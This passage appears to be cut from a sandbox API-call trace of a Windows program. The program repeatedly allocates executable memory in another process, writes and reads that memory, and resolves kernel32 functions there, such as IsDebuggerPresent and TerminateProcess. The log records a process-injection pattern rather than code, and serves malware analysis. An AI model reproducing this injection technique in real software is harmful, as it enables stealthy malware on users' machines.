lpBuffer=0x32e84e10*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.545] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.546] ResetEvent (hEvent=0x794) returned 1 [0184.546] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.546] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.546] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.546] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84e10 | out: hHeap=0x2150000) returned 1 [0184.546] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.546] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.547] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.547] lstrlenA (lpString="IsDebuggerPresent") returned 17 [0184.547] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.547] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d66a*, nSize=0x12, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d66a*, lpNumberOfBytesWritten=0xcd978*=0x12) returned 1 [0184.547] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.547] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84bd0 [0184.547] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.547] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84bd0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84bd0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.548] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.548] ResetEvent (hEvent=0x794) returned 1 [0184.548] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.548] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.549] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.549] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84bd0 | out: hHeap=0x2150000) returned 1 [0184.549] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.549] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.549] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.549] lstrlenA (lpString="UnhandledExceptionFilter") returned 24 [0184.549] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.549] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d67e*, nSize=0x19, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d67e*, lpNumberOfBytesWritten=0xcd978*=0x19) returned 1 [0184.550] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.550] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e848d0 [0184.550] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.550] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e848d0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e848d0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.551] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.551] ResetEvent (hEvent=0x794) returned 1 [0184.551] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.551] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.551] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.551] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e848d0 | out: hHeap=0x2150000) returned 1 [0184.551] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.552] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.552] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.552] lstrlenA (lpString="SetUnhandledExceptionFilter") returned 27 [0184.552] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.552] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d69a*, nSize=0x1c, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d69a*, lpNumberOfBytesWritten=0xcd978*=0x1c) returned 1 [0184.552] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.553] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84d20 [0184.553] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.553] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84d20*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84d20*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.553] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.554] ResetEvent (hEvent=0x794) returned 1 [0184.554] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.555] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.555] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.555] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84d20 | out: hHeap=0x2150000) returned 1 [0184.555] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.555] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.555] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.555] lstrlenA (lpString="GetStartupInfoW") returned 15 [0184.555] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.556] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d6b8*, nSize=0x10, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d6b8*, lpNumberOfBytesWritten=0xcd978*=0x10) returned 1 [0184.556] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.556] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85290 [0184.556] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.556] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e85290*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e85290*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.557] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.557] ResetEvent (hEvent=0x794) returned 1 [0184.557] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.557] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.558] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.558] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85290 | out: hHeap=0x2150000) returned 1 [0184.558] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.558] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.558] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.558] lstrlenA (lpString="IsProcessorFeaturePresent") returned 25 [0184.558] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.559] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d6ca*, nSize=0x1a, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d6ca*, lpNumberOfBytesWritten=0xcd978*=0x1a) returned 1 [0184.559] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.559] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84bd0 [0184.559] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.559] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84bd0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84bd0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.560] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.560] ResetEvent (hEvent=0x794) returned 1 [0184.560] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.560] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.560] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.560] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84bd0 | out: hHeap=0x2150000) returned 1 [0184.561] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.561] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.561] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.561] lstrlenA (lpString="QueryPerformanceCounter") returned 23 [0184.561] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.561] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d6e6*, nSize=0x18, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d6e6*, lpNumberOfBytesWritten=0xcd978*=0x18) returned 1 [0184.562] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.562] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84d80 [0184.562] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.562] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84d80*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84d80*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.562] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.563] ResetEvent (hEvent=0x794) returned 1 [0184.563] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.564] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.564] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.564] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84d80 | out: hHeap=0x2150000) returned 1 [0184.564] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.564] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.564] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.564] lstrlenA (lpString="GetCurrentProcessId") returned 19 [0184.564] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.565] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d700*, nSize=0x14, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d700*, lpNumberOfBytesWritten=0xcd978*=0x14) returned 1 [0184.565] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.565] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84990 [0184.565] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.565] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84990*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84990*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.566] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.566] ResetEvent (hEvent=0x794) returned 1 [0184.566] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.566] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.566] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.567] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84990 | out: hHeap=0x2150000) returned 1 [0184.567] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.567] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.567] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.567] lstrlenA (lpString="GetCurrentThreadId") returned 18 [0184.567] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.567] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d716*, nSize=0x13, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d716*, lpNumberOfBytesWritten=0xcd978*=0x13) returned 1 [0184.568] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.568] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84b70 [0184.568] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.568] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84b70*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84b70*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.568] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.569] ResetEvent (hEvent=0x794) returned 1 [0184.569] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.569] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.569] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.569] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84b70 | out: hHeap=0x2150000) returned 1 [0184.569] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.569] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.570] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.570] lstrlenA (lpString="InitializeSListHead") returned 19 [0184.570] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.570] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d72c*, nSize=0x14, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d72c*, lpNumberOfBytesWritten=0xcd978*=0x14) returned 1 [0184.570] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.570] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85170 [0184.570] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.570] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e85170*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e85170*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.571] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.571] ResetEvent (hEvent=0x794) returned 1 [0184.571] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.571] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.572] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.572] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85170 | out: hHeap=0x2150000) returned 1 [0184.572] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.572] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.572] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.572] lstrlenA (lpString="GetCurrentProcess") returned 17 [0184.572] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.572] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d742*, nSize=0x12, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d742*, lpNumberOfBytesWritten=0xcd978*=0x12) returned 1 [0184.573] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.573] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84d80 [0184.573] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.573] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84d80*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84d80*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.574] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.574] ResetEvent (hEvent=0x794) returned 1 [0184.574] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.574] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.574] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.574] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84d80 | out: hHeap=0x2150000) returned 1 [0184.575] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.575] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.575] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.575] lstrlenA (lpString="TerminateProcess") returned 16 [0184.575] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.575] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d756*, nSize=0x11, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d756*, lpNumberOfBytesWritten=0xcd978*=0x11) returned 1 [0184.576] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.576] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84840 [0184.576] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.576] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84840*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84840*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.576] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.577] ResetEvent (hEvent=0x794) returned 1 [0184.577] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.577] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 